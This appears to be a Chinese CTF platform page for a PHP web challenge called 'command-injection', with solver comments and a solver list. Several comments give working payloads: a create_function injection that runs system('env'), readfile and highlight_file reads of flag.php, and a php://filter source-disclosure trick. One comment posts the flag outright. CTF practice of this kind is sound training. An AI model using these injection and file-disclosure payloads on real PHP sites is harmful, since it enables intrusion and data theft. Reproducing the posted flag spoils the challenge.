command-injectionWEB 未解决

分数: 0 金币: 0
题目作者: 未知
一  血: tzzzez
一血奖励: 0金币
解  决: 191
提  示:
描  述:
nuaactf{}
评论
vincentshine 3月前

不知道为啥 http://82.157.146.43:10618/include.php?file=index 可以 显示出来,http://82.157.146.43:10618/include.php?file=createfun就不行

回复 0

xiaobai568 10月前

createfun.php?func=readfile&arg=flag.php,php查看文件的函数都可以试试

回复 0

coolsword2023 1年前

createfun.php?func=create_function&&arg=){}system("env");//

回复 0
xiaoxiao972521 10月前

这个角度清奇哎,我是createfun.php?func=readfile&arg=flag.php

回复 0

zhaiye 1年前

nuaactf{php_IS_thE_best_language}

回复 0

justsosoloveyou 1年前

html注释,cookie,/include.php?file=php://filter/read=convert.base64-encode/resource=createfun, /createfun.php?func=highlight_file&arg=flag.php

回复 0

hopeinhand 1年前

注释有一个include.php,访问发现有文件包含,调出源码后提示createfun.php,发现可以执行自定义函数,show_source flag.php

回复 5

WriteUp

image
2901600657

3 金币

评分(0)

暂无评分

解题动态

czg9000 攻破了该题 1天前
ssoocc 攻破了该题 4天前
A1234467 攻破了该题 4天前
bugku111rao 攻破了该题 12天前
wangdashuai 攻破了该题 1月前
dir_tree 攻破了该题 1月前
flaglspursuer 攻破了该题 1月前
biandanjun 攻破了该题 1月前
TOMCAT336699 攻破了该题 1月前
luogen 攻破了该题 1月前
zzhicecyb 攻破了该题 1月前
yanzong668 攻破了该题 1月前
Jokerz 攻破了该题 1月前
tianna 攻破了该题 1月前
yhxdsg 攻破了该题 1月前
DyNooob 攻破了该题 1月前
zxingxing121 攻破了该题 2月前
Ru1n 攻破了该题 2月前
fxstu 攻破了该题 2月前
coldplay99999 攻破了该题 2月前
问题反馈